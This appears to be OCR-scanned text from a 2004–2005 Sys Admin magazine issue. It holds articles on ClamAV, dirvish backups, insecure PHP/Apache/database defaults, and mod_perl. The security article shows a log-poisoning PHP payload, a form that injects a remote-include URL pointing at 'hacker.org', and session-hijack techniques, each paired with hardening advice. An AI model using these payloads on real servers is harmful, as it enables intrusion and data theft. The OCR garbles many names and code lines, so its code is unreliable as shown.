http://memberwebs.com/niel sen/software/clamsmtp/ 

6. ClamWin — http : / / www. cl amwi n. com/ 

7. Virus Bulletin — http://www.vi rusbul 1 eti n . com/ 

8. Unix Philosophy — 

http://www.faqs.org/docs/artu/ch01sO6.html 

9. ClamAV FAQ and mailing lists — 

http://www.clamav.net/faq.html#pagestart 

10. Author Notes— http://www.i-kong.com/clamav 

Jinn lives in unci runs his consulting business from Jersey City, NJ. He currently 
spends way too much time trying to turn his PC into the ultimate PVR 
Multimedia machine, but when he does tear himself away from his computer, he 
enjoys the dancing nightlife in NYC. He can be reached at.' j Ul)bOX.@i -kOUQ. COfll 
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BACKUPS 


Dirvish for Disk-to-Disk Backups — An Open 
Source Success Story 

Keith Lofstrom 


W hat will you do if a company that produces one of your 
critical software applications goes out of business? If it's 
proprietary software, you may be in big trouble, Open 
source, on the other hand, leaves you in control (sometimes, too 
much control). This article tells how I ended up managing an open 
source backup tool, dirvish. 

My integrated circuit design consultancy, KL1C, uses Linux and 
other open source software for nearly all important tasks. One criti¬ 
cal task is backup: 1 cannot afford to lose days of work to a disk 
crash or a typing error. In 2003, 1 moved from lape-based backups 
of individual machines to network- 
based disk-to-disk backups. After 
some experiments using rdump to 
swappable hard-disk media. J.W. 

Schultz told me about his disk-to- 
disk backup program called dirvish. 

Dirvish is a Perl wrapper around 
another open source tool, rsync. 

Rsync and Dirvish 

Rsync copies and maintains 
images of file systems between 
computers. Rsync can be used for 
mirrors, copies, and backups. With 
rsync, files are not just moved and 
copied, but are segmented, check- 
summed. and compared between 
source and destination machines. 

Only data segments with changed 
checksums or modification dates are moved. Rsync's • -1 j n k~ dGSt 
option permits Unix-stvle hard links to files in other directories on 
the destination machine. Hard-linking allows successive backup 
images to shaie identical data tdes and occupy the same disk space. 

Hard disk backup storage, and the linkage between backup 
images, have other benefits for my consulting business. Some con¬ 
sulting contracts require that all copies of client data be removed at 
the end of the project. This is impossible with tape-based backup: I 
cannot remove one client s data and email without wiping all inv 
backup tapes. With my backup data stored as a regular file system 
on disk, all I have to do is write over the client files; everything 
hard-linked to those files is written over as w'ell. 

Rsync typically uses SSH for secure transport between machines 
and sets up multiple data pipelines to reduce latency. Rsync has 
been potted to most flavors of Unix, and rsync clients are also avail¬ 
able for Windows anti Macintosh. Rsync is the execution engine for 
many new backup systems, including dirvish. 

Dirvish adds configuration-driven automation to rsync. making 
it suitable for cron-driven nightly backups, driven from by a central 
backup server. Dirvish permits networks of similar machines to 
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share portions of the backup images that are identical. Dirvish also 
has a sophisticated expiration process for removing selected older 
images and recovering backup drive space, 

Control of the backup process by the central backup server is 
critical. Client-driven backup schemes are possible, but this com¬ 
promises security and performance. Rsync is network-intensive, 
and only the server can properly sequence client backups to control 
network loading. The backup server must be absolutely safe from 
compromise: since it contains images of all clients, it represents a 
single-point security risk for the entire network. Fortunately, a 

dirvish backup server can be config¬ 
ured to perform only the outbound 
SSH connections necessary to rsync 
to the clients, while ignoring all 
inbound service requests. This 
makes the backup machine 
("server” may be a misnomer) diffi¬ 
cult to attack. 

1 use dirvish to perform nightly 
backups of half a dozen machines 
(about 100 GB total data), on-site 
and remote, in about one hour. My 
system data changes infrequently. 
Given the efficiencies brought by 
hard-linking between images. I 
can store 200 or more nightly 
images on a 250-GB backup drive 
on my main server. With large 
IDE hard drives selling for less 
than 60 cents per gigabyte. 1 have greatly reduced the cost and 
bother of making nightly backups. 

A worst-case failure might destroy both the server and the 
backup drive in it. I have multiple IDE backup drives in hot-swap- 
pable. removable trays (e.g., see http://www.vipower.corn). 1 then 
rotate the drives to a fire-resistant safe each day. By rotating the 
backup drives to the sate (which is easy W'ith hot-swap), even worst- 
case failures or lull security breaches are survivable. 

Bare-Metal Recovery 

Backup is only halt the problem, of course; rebuilding a crashed 
hard drive is every sys admin's nightmare. I build backup drives 
with a 5-GB bootable Linux partition and a 2-GB swap partition, 
slightly reducing the size of the main backup partition. For a bare- 
metul server recovery. 1 boot from the backup drive and use simple 
scripts to rebuild the main server hard drive. A client drive can be 
rebuilt in a third server drive bay. from a second drive bay on the 
client, or on a different machine entirely. Full restores now take five 
minutes of configuration work, followed by a couple of hours of 
disk-to-disk copying. 
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Windows and Macintosh OS X drives may be more difficult to 
restore from bare metal. These file systems are not fully supported 
by Linux, so the restores must be performed natively, on a live 
Windows or Macintosh machine, to a second empty disk. This can 
be done over the network with rsyne, but the process will involve 
careful sequencing of scripts at both ends. 

The situation is tolerable for Macintosh OS X. There is rsyne 
support for both UFS/FFS and the older FIFS tile system. It should 
not be difficult to run dirvish and its associated scripts natively on 
one machine under OS X, or between OS X machines (although I 
have not tried this). If the backup drive is connected with USB2. 
then hot-swaps can be performed with USB2 mount and unmount. 

On Windows, some files may not be accessible to rsyne for read 
and write. This is an intentional “feature of Windows; Microsoft 
does not want it to be easy to copy their proprietary code. Microsoft 
or other third-party licenses may forbid backing up their software to 
another hard disk. 

If you are backing up purchased, proprietary programs or 
information, you may be legally restricted in what you may back 
up and how you may do it. Digital Rights Management hardware 
and software may add further complications. Consult your 
licenses and your lawyers. 

These complications are part of the cost of running proprietary 
operating systems that use file systems without open specifications. 
We can still restore most of user-created Windows tiles and directo¬ 
ries over the network, and that should be good enough for helping 
most Windows users maintain their data integrity day-to-day. It 
Windows users want robust, inexpensive, easy-to-inaintain, legally 
unencumbered, and technologically advanced solutions to their 
problems, they may want to consider open source offerings. 

Dirvish is a great tool — it s a little rough around the edges, and 
needs better documentation, but it’s turned a big backup chore into a 
small one. Other users have also found J.W. Schultz's open source 
software project very useful. In gratitude, 1 prepared slide talks and 
writeups of my experiences with dirvish and presented them at user 
groups and conventions. J.W. was very helpful in critiquing and 
improving these presentations. 


And Then It All Changed... 

The technical editor of Sys Admin magazine. Hal Pomeranz. 
attended one ot my presentations and asked me to write an article 
about dirvish for the October 2004 issue on backups. I wiotc excit¬ 
edly to J.W. to invite him to co-author the article, which would be a 
real boost to his consulting company. Pegasystems Technologies. 
Strangely, there was no response. With the due date tor the article 
looming, I had to tell Hal that no article w'as possible without the 


original author of the code. 

All 1 knew r about J.W 7 . w'as that he was a middle-aged consultant 
in the San Francisco bay area, a good Perl coder, and a lan of the 


former U.S. space program. 1 didn't even know his Inst name, or his 
phone number. Even his site registration was anonymous. In the 
open source community, this really doesn i matter much, until you 
want to find someone. 

The original download site for dirvish. http://www.pegasys.ws, 
w f ent off the air sometime in May. In June, as a precaution, 1 regis¬ 
tered the domains “dirvish.org and "dirvish.com . It J.W. lcap- 
peared, the domains would go to him. After another month 
without news, 1 took an archived version of the site (from 
September 2003) and activated the domains on my Web server. 1 
patched in the latest version of the dirvish Perl code from the 
Debian archives. Later versions of pegasys are now beginning to 
appear at http://www.archive.org. 


In July 2004.1 was told of a March Sacramento newspaper arti¬ 
cle. describing the death of software consultant Jonathan W. 
Schultz of Antioch. California, by drowning in Lake Mead. I have 
since made contact with Jon’s parents. Jon was 42 when he died. 

He was reclusive, yet he had Internet friends all over the world. He 
contributed heavily to the development of rsyne. He was a devout 
Christian and will be missed by many. 

Jonathan was a natural coder who could think in Perl. I once 
asked him if I could annotate the dirvish Perl code with comments. 

He replied. “If the code is so littered with comments as to call for a 
grep -v to make it readable as code, the comments should be 
removed. You should edit the same code that you read. As Jon s 
father later explained, "He once told me that when he looked at the 
printout, it was like looking at a picture of a person, and if some¬ 
thing was in the wrong place or malformed it would be very obvious 
to him. This was a God-given gift that neither of us understood...”. 

Most programmers do not have that gift, and Perl is a very rich 
language, making it more difficult to read than other languages. 
j.W.’s death left dirvish users and developers in a quandary; where 
do we go with dirvish 7 How can we improve mission-critical code 
that we control but do not fully understand? 

Continuing the Work 

The custom in the open source community is that if the origina¬ 
tor of a software package disappears or loses interest, another may 
take up the code and continue. While I am a mediocre coder, and a 
Perl new'bie. 1 have managed technical projects and ain better than 
most at technical communication. Since management and commu¬ 
nication are dirvish's greatest needs. T took temporary control of the 
dirvish project. Perhaps a better leader will emerge in time. 

And I am diving deep into Perl. Randal Schwartz books 
Learning Perl and Perl Objects, References, and Modules have been 
invaluable to my education, and his regular column in Sys Admin 
has been useful as well. The Portland-area Perl community is very 
supportive, and w hen 1 don t understand something, iheie aie plentv 
of people to help. 

I set up a wiki at http://www.dirvish.org/wiki, where users 
and contributors can add their information, patches, and lequests foi 
enhancements. In just a lew months, there have alieady been some 
wreat contributions. We are accumulating patches for a small exper¬ 
imental release, while we develop techniques lot testing the code 
for future general releases. By the time you read this, we should 
have an active mailing list. 

There are still important management issues to address. The 
code needs more comments; ordinary programmers must be able to 
read it. We may veer from J.W.'s “no comment" approach to make 
the working environment safer. I am writing a design description oi 
the software lot the wiki. The configuration file format is confusing, 
w ith some things becoming Perl scalars and othei things becoming 
lists in an overly restrictive way; we need to make the configuration 
task easier. 

Finally, additional tools need to be created or borrowed front 
other packages. A more automated restore system is needed, one 
that easily adapts to changing partition needs and permits the selec¬ 
tion and mixing ot different backup images. Single hie testoie 
should be driven by users, with minimal intervention by systems 
administrators. 

1 may make all of these things happen, or none of them. Since 
dirvish is an open source software package, others arc Irec to con¬ 
tribute improvements, bug fixes, or whole new interfaces. II others 
discover problems, they are free to discuss them in public and seek 
help from members of the dirvish community. Testing results are 
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public; if something doesn’t work, users can learn about the prob¬ 
lem quickly. If I mismanage the project, others are free to fork the 
code, rename it, and abandon me to the contemplation of my errors. 

Free software is about freedom and allows you to make your 
own right (or wrong) decisions or delegate them to the organizations 
that you choose. It gives you control. Free software is also about the 
benefits of cooperation and contribution. Even if you have a lot of 
clout with a proprietary software vendor, you are unlikely to get the 
enhancements you need, when you want them, and how you want 
them. The most direct way to get what you need in an open source 
package is to design and program the enhancements yourself. In the 
worst case, the enhancement you offer may get rejected by the 
maintainer and the other users; you can still apply your patches to 
your own version. A more likely outcome is that some of the other 
users will agree with you, and you can test, maintain, and improve 
your patch with others. 

However, the most likely outcome is that your improvement will 
be gratefully accepted by maintainer and users alike and result in a 
cascade of improvements on your improvement. The maintainer 
will probably be gratetul tor the contribution, and other users are 
likely to have the same needs you do. You will not have to light your 
way through layers of managers and marketers, and you will not 
have to fit some vendor’s strategic plan. The needs of the contribu¬ 
tors always outweigh the hypothetical needs of “future customers”. 
Best of all. others will test your code in widely varying situations; 
by sharing your code, many mistakes will be found and corrected by 
others, before they affect you and your company. 


Conclusions 

Your contribution does not need to be large; it can be as simple 
as a single line of code, another test case, or even a spelling cor¬ 
rection. The main difference between a successful or unsuccessful 
contribution is your own understanding of the intent of the soft¬ 
ware and how the community already uses it, and your willingness 
to cooperate with others. Please help us develop dirvish and rsync. 
Join us on the wiki at http://www.dirvish.org/wiki and discuss 
your needs, share your experiences, and offer your enhancements. 

In the second part of this series. I'll discuss how to install and 
configure dirvish. I will set up an example network and install hard¬ 
ware and software to do dirvish disk-based backups. In the third 
part ot the series. I will use these backups to do bare-metal restores 
of client and server hard drives. 

Resources 

KLIC — http: //www. kl -ic.com 

Dirvish — http://www.dirvish.org 

Dirvish Wiki — http://www.di rvish.org/wi ki 

Keith Lofstrom (http:! I WWW. keithl.com owns an integrated circuit design 
consultancy in Beaverton. Oregon. His specialty is mixed-signal and statis¬ 
tical design for deep submicron processes, as well as design for testability 
using the IEEE 1149.x standards. Keith has been using some flavor of Unix 
since 1980 , and although he admits to a brief flirtation with DOS and 
Windows, he has seen the error of his ways. He is currently managing the 
dirvish backup program. 
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SECURITY 


Insecure by Default 

Lukasz Wojtow 


I t seems so easy — download Apache, throw PHP together with 
some database, and you have a new server for dynamic Web 
pages. It's true: building Web servers has never been easier or 
cheaper The price paid for ease of use and installation, however, is 
loose configuration — designed not to create problems on startup 
but not to be the most secure. This article describes how configuring 
MySQL, PostgreSQL, PHP. and Apache with their default settings 
can lead to security breaks. Some of the issues covered can be 
applied only to shared hosting, where an attacker owns a virtual host 
and has unprivileged, local access to the system. 

The software described in this article is Apache (v 1.3.31}. PHP 
(v4.3.8), MySQL (v4.0,20), and PostgreSQL (v7.4.5). All compo¬ 
nents are installed from source with default options; PHP is 
installed as a DSO module, and Linux 2.6 is used as an operating 
system. 

A main worry for Web administrators is so-called "remote code 
inclusion”. When this happens, attackers can include any code and 
execute it in the server context. The consequences are endless, and 
unrestricted viewing of scripts’ variables (like password to database) 
is one of the least dangerous. Exploiting remote code inclusion can 
take two forms: 

* Including truly remote files 
through HTTP/FTP protocol. 

* Including local ides with content 
controlled by a remote attacker. 

The first attack is possible because 
of the most often abused PHP 
option, allow_url_fopen. which 
according to the configuration file 
(usually /usr/local/lib/php.ini) 
is switched “On” by default. This 
option allows the inclusion and exe¬ 
cution of remote tiles as if they were 
local — a favorite technique oi 
attackers. Very few sites really need 
this possibility, so switching it "Off 
worldwide and switching it “On" 
only in cases where if s really needed is a good idea. The second 
approach is used when a script checks tor a file s existence (1 unc¬ 
tion fi le_exi St$() does not work for remote fdes in PHP 4.x) 
and then includes it. Webmasters often forget that attackers have 
influence over at least one local file - the server log. 

Appending the argument ?dummy=’<?php;phpinfo();?> ’ to 
the URL places PHP code in the accessjog. After including the 
aceessjog tile in another request, the phpi nfoC ) function will be 
executed. The server's log path is not an issue here because one of 
symbolic links in /proc/self/fd/ points to the correct file. This 


capability exists because of the server logs' default permissions — 
they are world-readable: 

1Is -1 /usr/local/apache/lDgs/* 

-rw-r--r-- 1 root root 8186 2004-10-03 16:43 \ 

/usr/local/apache/logs/accessjog 
-rw-r--r-- 1 root root 12613 2004-10-03 16:43 \ 

/usr/ local/apache/logs/errorj og 

This should he changed immediately after installation not only to 
stop the described attack technique, but as a protection against 
brain-dead scripts that pass confidential data in GET arguments. 

When it comes to exploiting remote inclusions, attackers usually 
change the URL in a browser's address bar. This approach is tast 
and convenient but has one huge drawback — it is logged. To hide 
suspected parameters, attackers take advantage of two PHP settings: 
option “register_globa]s”, which for compatibility reasons is usu¬ 
ally turned “On” after installation (88% of servers); and option 
“gpc_order” (or “variables_order" in newer versions). The former 
makes all variables available to a PHP script as “$option_name , 

and the latter sets the overriding 
order for variables with the same 
name (including GET. POST, 
COOKIE, etc.). 

With the default value of “GPC\ 
GET variables will be overridden by 
POST and then by COOKIE. So, it a 
script receives a variable of the same 
name twice — once as GET. and 
once as a cookie — the variable will 
be set on the value from the cookie. 
That is. if an attacker wants to set 
script's argument “file" on his hie, 
the GET argument should remain 
unchanged (say “offer.htm I”), but 
the cookie should contain a refer¬ 
ence to the attacker’s file. This way. 
the attack will be logged like other 
legitimate visits and the administra¬ 
tor will have no chance to spot it. If the script accepts POST data, 
including the value in a torm can also be used: 

<form method=”post" action=http://victim.com/show.php7fi1e=offer.html> 
<input type="text" name=”f i1e” value="http: / /hacker.org/attack.txt"> 

<iinput type="submit"> 

</form> 

Chansing the "gpc_order” value on “CPG" will not stop attackers, 
but at least the systems administrator will be able to see that 
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something is wrong (like finding a script that is always called with 
the i ncl ude= argument being called without it). 

It would be naive to think that PHP does not provide any config¬ 
uration options to make it secure in multi-homed environments. 
And, indeed, there is a set of tile system limitations called “safe 
mode". This feature has had some security problems but is designed 
for ISP servers and definitely should be turned on. It is disabled by 
79% of servers (see Table 1). 

Running PHP with safe mode and CGI scripts with Apache-sup- 
ported suExec (which changes process uid before executing CGI) 
seems to provide good protection against the abuse of Web server 
privileges. Unfortunately, it is not perfect under the default configu¬ 
ration. When safe mode is enabled and suExec deployed, *.php tiles 
are not world readable, they belong to their users and some special 
group in order to enable Apache processes to read them. But, the 
option “FollowSymlinks” in httpd.conf provides an opening for 
attackers. 

Using a CGI script, an attacker can create a symlink (with exten¬ 
sion .txt) pointing to any file in any other domain. If the symlink is 
requested by the attacker, the pointed file will be displayed. The 
simplest way to fix this is by enabling the option 
“SymlinksIfOwnerMatch" in the configuration file. 

One of the most common tasks for PHP scripts is authenticating 
users. This is usually done by PHP's built-in “sessions" feature. For 
example, a logging script checks the username and password and, if 
they match, sets the variable “logged" to “true". All other scripts in 
this domain will then receive this variable and grant access to the user: 


<?php 

if($_SESSION['logged’]—true) ♦ 

// user already logged in 

else 

// user not logged in 

?> 

This seems secure, because users cannot set session variables 
remotely, but a problem arises on shared hosting. Sessions files for 
all virtual servers reside in one location — by default, the /tmp 
directory (on 86% of servers). This way. the PHP engine has no way 
of distinguishing which virtual server started a particular session. 

If an attacker knows the name of the checked variable (“logged" 
in previous example), then this variable can be set by his domain 
hosted on the server. Appending PHPSESSID from the attacker’s 
domain in requests to the victim’s domain will result in bypassed 
authentication. One solution is to set a different session.savc_path 
for each virtual server. 

Because the /tmp directory is world-readable, however, keeping 
session files there results in another problem. Even if every single # 
script checks the username and the password, authentication still 
can be bypassed: 

<?php 

include!’functions.inc.php'); 

if(password_correct($_SESSION[‘user’],$_SESS10M[* password *]) 

// password correct 



Your Total System Information Tool 


Hardware 

Software 

Storage 

Configuration 

Network 

Printers 


- Linux 

- Sun 

- MacOS X 

- HP-UX 

- IBM AIX 

- FreeBSD 


- NetApp 

- EMC 

- Veritas 


Full CLI, GUI, Perl/C/Shell API 

Free Demo Download! 

www.MagniComp.com/sa2 



r\i 


else 

// password incorrect 


?> 

An attacker can list files in the /tmp directory from time to time and 
look for new sessions being created. One of them will surely belong 
to a user freshly logged into the victim’s site. Session tiles arc 
named after their ids. so listing files gives the attacker everything 
necessary to hijack the session. In my view, it is bizarre to keep 
these files in a directory like /tmp where everybody with local 
access can see them. 

Sharing this directory is generally a bad idea, but there is yet 
another problem with it. By default. MySQL and PostreSQL use 
this directory for their sockets, and every PHP script connects to the 
database through them. PHP has no way to find out whether sockets 
were actually created by database daemons. Because the /tmp direc¬ 
tory is world-writable, they could be created by anyone. That means 
that scripts can give away passwords or display Web pages with 
data taken from a fake database. 


Table 1 Default options remain insecure on the majority j 
of servers \ 

Option Name 
(Insecure Value) 

% of Servers with 
Insecure Value 

allow url fopenn (On) 

93% 

safe mode (Oft) 

79% 

session.save path ('/tmp’) 

86% 

mysql.allow_persistent (On) 

66% 
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The first issue of the new year is typically the one we dedicate to open source 
topics. This issue is no exception, and it features articles describing open source 
tools that, among other things, scan your network for viruses, perform disk-to-disk 
backups, enforce IP access policy, and distribute DNS data to multiple servers. 
Also in this issue. Bryan Smith begins a two-part article examining the terms open 
and proprietary, which are generally used to categorize software. He proposes new, 
more distinct labels and assesses the associated deployment risks of the various 
types of software. 

If you’re interested in following other open source vs. proprietary battles, the 
Groklaw site at: http://www.grokIaw.net provides daily updates and commen¬ 
tary along with historical perspective on the machinations surrounding the SCO 
controversy and related issues. It’s worth a moment to check out the current state 
of affairs there. 

Sxs Admin magazine recently adopted a new online look. 1 invite you to visit the 
Sys Admin Web site at: http://www.sysadmirnnag.com and see what you think. 
We’re still fixing a few trouble spots, so be sure to send feedback if you see broken 
links or other problems. We're in the process of converting UnixReview.com to this 
new format as well, so look for it to be updated in the near future. 

Also, just in time for holiday shopping. Version 10 of the Sys Admin back issue 
CD-ROM is now available. It includes complete articles and code from the mag¬ 
azine’s premiere issue in 1992 through December of 2004. It also includes The 
Peri Journal archives from 1996 through 2002 and offers both HTML and ASCII 
versions of the content. As in the past, a few articles do not appear on the CD 
either because we couldn t track down the authors to request permission or 
because they chose not to have their content included. The back issue CD can be 
ordered online through the Sys Admin Web site for $49.95 ($24.95 for registered 
owners of the previous version). See page 58 for more information. 

If you'd like to see an article of yours included in a future Sys Admin CD, you 
can begin by sending a manuscript proposal to our managing editor. Rikki 
Endsley, at: rends 1 ey@cmp. com. Currently, we’re looking lor articles on spam 
management, clustering, remote access, and database management, but other 
topics will be considered. Please send questions or comments to Rikki or to me 
at: aankerholz@cmp.com. 

Sincerely yours, 

Amber Ankerholz 

Editor in Chief 
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If an attacker manages to create his own sockets, the conse¬ 
quences can he serious, so sockets should be kept somewhere else. 
To avoid this potential attack, a few steps must be taken. First, two 
directories must be created — one for MySQL socket, and one for 
PostgreSQL. Neither directory should be world writable. Second, 
software must be informed to use these directories. 

In MySQL's config file (/etc/my. cnf). the option “socket" must 
be changed (in both sections — [client] and [server]). To inform 
PUP about the changed option “mysql.defauli_socket". the PKP 
config must be updated. Unfortunately, the PostgreSQL case is a bit 
more complicated. The simplest way to change the default socket 
directory is to alter the definition DEFAULT_PGSOCKET_DIR in 
PostgreSQL sources in file sre/include/pg_config_manua 1,h 
(about line 168). then rebuild and reinstall the database. 

Other database options can also cause problems. It is well 
known that connecting to a database is a time-consuming task. To 
speed up this process, persistent connections are used. After persis¬ 
tent connections are established, all details are kept by the PHP 
engine between requests to a particular Apache child process. If a 
script wants to connect to the database again, it receives the connec¬ 
tion that was established the last time. 

A problem arises because of the way Unix-like systems treat 
tile descriptors. First, they are inherited after executing a new 
program: second, they are represented by integer numbers in a 
process. Neither MySQL's nor Postg re SQL's client sockets are 
marked as close-on-exec, which means they can be inherited by 
any program executed by an Apache child process. All an 
attacker has to do is upload a malicious script on the server and 
keep making request to it through http protocol. If a request is 
accepted by a child process that previously had established per¬ 
sistent connections for other domains, the attacker will get access 
to these databases. Details about this attack with a sample pro¬ 
gram tor MySQL (PostgreSQL is also affected) are available 
from: http://bugs.mysq] .com (bug id 3779). This attack is pos¬ 
sible only when persistent connections are allowed, that is about 
66% of servers. 

Persistent connections are entirely PHP's responsibility and can 
be switched off by setting the options “mysql.allow_persistenf' and 
"pgsql.allow_persistent" to “Off' in PHP's config file. 

I hope this article will be useful as a post-installation checklist. 
As I've shown, the default configuration of software is not always 
secure. But. these problems can often be solved by choosing the 
piopci options in configuration tiles. Open source software is popu¬ 
lar tor its low cost, robustness, and ease of use. The only thing 
remaining is to tighten its security for your specific needs. 

Resources 

Apache Web server — http://www.apache.org 
PHP server-side language — http://www.php.ret 
MySQL database — http: //www.mysq].com 
PostgieSQL database — http:/ /www. postgresq] .org 
Close-on-exec MySQL discussion — 
http://bugs.mysq].com/bug.php?id=3779 
Vinesys security survey —- 

http://www.vinesys.net/surveys/ibd.html 

Lukasz Wojtow has a BSc in Computer Science from The College of 
Management and Public Administration , Zamosc, Poland and is starting his 
Masters m London next year. His main interests are security and program¬ 
ming. and in his free time he enjoys walks in Hyde Park and flies FI 6 (simu¬ 
lator only). He can be reached at; ? w@vtsz i3. edu. p 1. 
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The Magic of mod_perl 

Frank Wiles 


I often run into people who are confused about what mod_perl is. 
Some people think mod_pcrI is only useful to speed up CGI 
scripts. Some oddly believe it to be a heretical and incompatible 
version of the Perl programming language, while others are very 
confused and think mod_perl is just another fancy way of saying 
Per 1/CGI. Fortunately, all of them are wrong. With the upcoming 
release of mod_perl 2.0 (mod_perl 2.0 is very near release as ot the 
writing of this article and likely will be released before this is pub¬ 
lished), I wanted to better explain mod_perl. 

In short. mod_per! embeds a 
Perl interpreter directly into your 
Apache Web server. It does have 
the wonderful added benefit ot 
speeding up your CGI scripts, but 
that is just a taste of its power. The 
real power of mod_perl is the abil¬ 
ity for you to directly use all of the 
Apache API from Perl. This is also 
what sets mod_perl apart from 
other similar technologies such as 
PHP (mod.php) and Python 
(mod_python), which only allow 
you to control the content or 
response phase of the Apache 
server. 

When a browser requests a page 
from an Apache server, the request 
goes through several processing 
phases. Some are related to access, 

authentication, logging, but the most common is the response phase. 
The response phase is what you work with when building a Perl 
CGI or a PHP script. It is the part of the process that generates the 
actual HTML page and returns it to the browser. 

The power of mod_perl is that it gives you the ability to 
replace the default behaviors of any of these phases with your 
own phase handlers. mod__perl handlers can be thought ot as 
true Apache modules, plugged directly into the server, rather 
than a script or other outside process. Each handler is a different 
Perl module that you have written to deal with a particulai 
phase. This can also help code reuse by allowing you to share a 
particular logging or authentication handler on many different 
sites or servers without having to alter any other aspects ot the 
Apache process. 

Here are some examples of mod_peii’s abilities: 

, Log all requests to http://www.domain.com/admin/ into a SQL 
database, thus capturing the information we care about and stdl 
loosing the rest of the site to the normal Apache log file for traffic 

analysis. 



Replace Apache's flat file Basic auth with a SQL database that 
controls access both by username/pass wmrd as well as by date and 
time of the request. This could be used to allow employees access 
to an application only during oft ice hours. 

mod_perl gives you the ability to configure your Apache Web 
server with Perl code. Use this to easily configure a large amount 
of Virtual Hosts by querying a database instead ol manually con¬ 
figuring them in httpd.conf. 

Apache filters allow you to filter the output of any flat file, a script 

written in another language, or even 
another mod_perl handler before 
sending the page on to the browser. 
This can be used to clean up the out¬ 
put of a legacy system without hav¬ 
ing to modify the original code. 

• Because Apache 2.0 is protocol 
agnostic, you can even make your 
server speak protocols other than 
HTTP. An example of this is to 
build a SMTP server in mod_perl 
and a corresponding Web applica¬ 
tion to control how it operates. 

Installation 

Installing mod_perl is a rela¬ 
tively easy task. If you are using a 
recent Linux distribution, you may 
have it installed already. niod_per! 
2.0 does have some prerequisites, 
namely a recent Perl and Apache 2.x. If both of these are already 
installed, all that is required is downloading the mod_perl souice 
code from http://perl.apache.org/download/ and issuing the 
following commands; 

# tar -xvzf mod_perl-2.x.xx.tar.gz 

# cd mod-perl-2.x.xx 

# perl Makefile.PL MP_APXS-/path/to/apxs MP_INST_APACHE2=1 

# make 

# make test 

# make install 

Once mod_perl is installed, you will need to configure it in your 
httpd.conf by adding the following configuration options: 

LoadModule perl_module module$/mod_perl.so 
Perl Require /path/to/perl/Iibs/startup.pi 

The startup.pl script allows you to set up your @1NC library path 
and preload any modules that you want shared among your 
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Apache server children. For the following examples. I'm using 
the minimal startup.pl: 

use lib qw(/path/to/perl/1ibs); 
use Apache2; 

1 ; 

mocLperl and CGI 

mod_perl speeds up your CGI scripts by getting rid of the infa¬ 
mous “fork, compile, execute" problem. When running a normal 
CGI. the Apache Web server forks a Perl interpreter, which in turn 
compiles and executes the Perl source. With normal CGIs, this 
process is repeated for each request made to the CGI. We remove 
the expensive forking step with mod^perl by having an embedded 
interpreter inside of our Web server. However. mod_perl also will 
compile the Perl source on server startup and keep it in memory. 
This leaves only the actual execution of the code on each request. 

As I'm sure you can imagine, this greatly increases the speed 
of most CGIs, often as much as 100 times their original speed. To 
configure this for all of your Perl CGIs in the directory /modperl/. 
simply add this to your Apache’s httpd.conf: 

<Location /modperl/) 

SetHandler perl-script 
PerlResponseHandler Modperl::Registry 
PerlQptions +ParseHeaders 
Options +ExecCGI 
</Location> 

This instructs mod_perl to compile the Perl scripts in the /modperl/ 
directory — once for each Apache child - and store it in memory. 
The script edited on disk mod_perl is smart enough to recompile on 
the next request to reflect your changes. 

URL Transformation 

One challenge that faces many W r eb site administrators is that of 
reworking your file system layout without breaking existing book¬ 
marks and deep links into your site. Sometimes these can be fixed 
with redirects or mod_rewrite rules, but these can quickly become 
unwieldy on large sites. 

Suppose vou run a new's Web site where your aiticles are stored into 
a different directory each day and you want to change this layout 
slightly. You want to be able to change requests for: 

http://www.example.com/20041106/article-title.html 

into something like: 

http://www.example.com/archive/2004/ll/06/article-title.html 

on the fly. A URI is mapped to filenames in the TransHandler phase 
of the Apache life cycle. Using mod_perh we can easily change the 
default behavior with a translation handler like this: 

package My : : LayoutChanger; 

use strict; 
use warnings; 

use Apache: -.RequestRec 0; 

use Apache::Const -compile => qw(DECLlNED): 


sub handler [ 
my $r - shift; 

# See if the requested URI follows our old style of having 
If an eight digit directory in the fenm of /YYYYMMOD/ 
if( $r->uri =~ m| A /\d{81/|o ) { 

if Extract the parts of the date and the filename from the 
if requested URI 

my ($year. Smonth, $day, Ifile) = 

$r->uri — m| A /(\d\d\d\d)(\d\d)(\d\d)/(.*?)$|o; 

if Replace the URI transparently 

$r->uri(“/archive/$year/$month/$day/$file"); 


if Return DECLINED so that other trans handlers can be 
# called if necessary 
return! Apache::DECLIMED ): 

} 

1; 

You configure this in Apache's httpd.conf with the following direc¬ 
tives: 

PerlModule My::LayoutChanger 
PerlTransHandler +My;:LayoutChanger 

A handler like this could easily be converted to handle multiple site 
redesigns in the same module, or you can stack the handlers so that 
each new filesystem layout is a different Perl module, each handling 
a different set of URI rewrites. You can also map an existing static 
HTML site into a new dynamic application by building the URI and 
the HTTP query string with $r->args. 

Dynamic Content 

One of niod_per!’s most interesting features is I/O filtering. 
Filtering can be used to modify static files on the fly or even the 
output of another program. If, for example, you would like to 
automatically add the last modified date and time to the bottom of 
all of the pages in a particular directory, you would use a filter 

much like this: 

package My::Filter; 

use strict; 
use warnings; 

use base qwtApache::FiIter); 

use APR;:Finfo 0; # for file information 

use APR:liable {); # For $f->tr->headers_out->unset 

use Apache::Const -compile => qw(OK); 

use constant BUFFER => 1024; 

sub handler { 

my $f = shift; # Our filter object 

my t r = $f->r; # Our Request object 

my $finfo - $r-)finfO; If Our file info 
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# Convert last modified time into a human readable format 
my $time - localtime($finfo->mtime); 

it Unset our Content-Length headier since we will be changing 
it the content’s length, 
uni ess( If->ctx ) { 

$f->r->headers_out->unset(’Content-Length’); 

$f->ctx{l); 


it Read the file 1024 bytes at a time 
whi1et $f->read(my $buf, BUFFER) ) [ 

it Replace the closing BODY tag with our last modified 

it date and time 

iff $buf — /<\/B0DY>/i ) { 

$buf — s/<\/B0DY>/Last modified: $time<\/BQDY>/i; 

) 

$f->printf tbuf); 

) 

returnC Apache::OK ); 


To configure this filter for the /content/ directory, you would add the 
following to your httpd.conf: 


PerlModule My::Fi1 ter 
<Directory /content/) 

SetHandler modperl 

PerlOutputFilterHandler My::Filter 
</Directory) 

Conclusion 

While mod_perl gives you easy access to tweaking how your 
Apache server behaves, it also proves to be an efficient and scalable 
platform on which to build large Web sites and enterprise applica¬ 
tions. mod perl is used for such large traffic sites as slashdot.org, 
livejoumal.com, and ticketmaster.com. I’ve been building LAMP 
(Linux Apache Mod_perl PostgreSQL) applications with mod_perl 
for years and have never felt limited by it. 

I hope this introduction to mod_perl 2.0 has piqued your inter¬ 
est. The mod_perl homepage (http://perl.apache.orgj offers a 
large collection of online documentation, links to print resources, 
and the user s mailing list, which can help you take full advantage 
of mod_perl. 

It you get stuck solving a mod_perl problem, send a question to 
the niod_perl users mailing list, which often provides answers 
